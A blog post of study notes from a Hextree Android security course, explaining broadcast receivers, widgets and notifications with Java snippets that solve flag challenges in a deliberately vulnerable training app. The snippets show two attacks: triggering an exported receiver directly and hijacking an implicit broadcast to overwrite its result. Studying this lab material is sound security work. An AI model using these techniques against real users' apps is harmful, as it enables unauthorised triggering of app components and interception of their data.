Post

Broadcast Receivers

Posted Updated
By Kyrillos Nady
2 min read
Broadcast Receivers

Basic Broadcast Receivers

There are two ways how broadcast receivers could be used by an app. First they could be exported via the AndroidManifest.xml with a <receiver> tag.

The other way is by dynamically registering a receiver class using registerReceiver().

As an example we can look at the AntennaPod app how it uses broadcast receivers. We are going to use this app as an example throughout this course, so make sure to download it.

Sending Broadcasts

You can also practice basic broadcast interaction with the Intent Attack Surface app. Try to send a broadcast to the exported Flag16Receiver and trigger the call to success().

1
2
3
4
5

Intent intent = new Intent();
intent.setClassName("io.hextree.attacksurface",
        "io.hextree.attacksurface.receivers.Flag16Receiver");
intent.putExtra("flag", "give-flag-16");
sendBroadcast(intent);

System Event Broadcasts

There exist several broadcast actions that are used by the system - obviously regular apps are not allowed to send them. But that doesn’t mean the receivers that handle these are properly protected.

Maybe if you make change in the action string it will work

Intercept and Redirecting Broadcasts

Hijack Broadcasts

Lots of concepts we have learned about for regular activity intents can also be applied to broadcast receivers. For example hijacking implicit intents. Can you intercept the broadcast sent by the Flag18Activity to get the flag?

1
2
3
4
5
6
7
8

BroadcastReceiver receiver = new BroadcastReceiver() {
            @Override
            public void onReceive(Context context, Intent intent) {
                setResultCode(2);
                setResultData("kero"); 
            }
        };
        registerReceiver(receiver, new IntentFilter("io.hextree.broadcast.FREE_FLAG"));

Malicious Return Values

With activities we have seen that an activity can also return a result back to the caller. With broadcasts there is also a way to handle responses which is additional attack surface.

1
2
3
4
5
6

        Intent intent = new Intent();
        intent.setClassName("io.hextree.attacksurface",
                "io.hextree.attacksurface.receivers.Flag17Receiver");
        String FlagSecret = "give-flag-17";
        intent.putExtra("flag", FlagSecret);
        sendOrderedBroadcast(intent, null);

Home Screen App Widgets

Widgets are a cool feature allowing apps to create small user interfaces that get directly embedded on the home screen. This means the widgets are actually running within another app!

The AppWidgetProvider is actually a wrapper around BroadcastReceiver to update the widget data in the background. It can also handle interactions with the widget such as button presses. But because the widget is running inside the home screen, broadcast PendingIntents are used to handle the button presses.

The Notification System

Notifications can be easily created using the notification builder. Inside of notifications you can also add button actions by preparing a PendingIntent. The reason for that is because the notification is again handled by a different app.

THANKS FOR READING ❤️

Hextree-Android-Course
android hextree
This post is licensed under CC BY 4.0 by the author.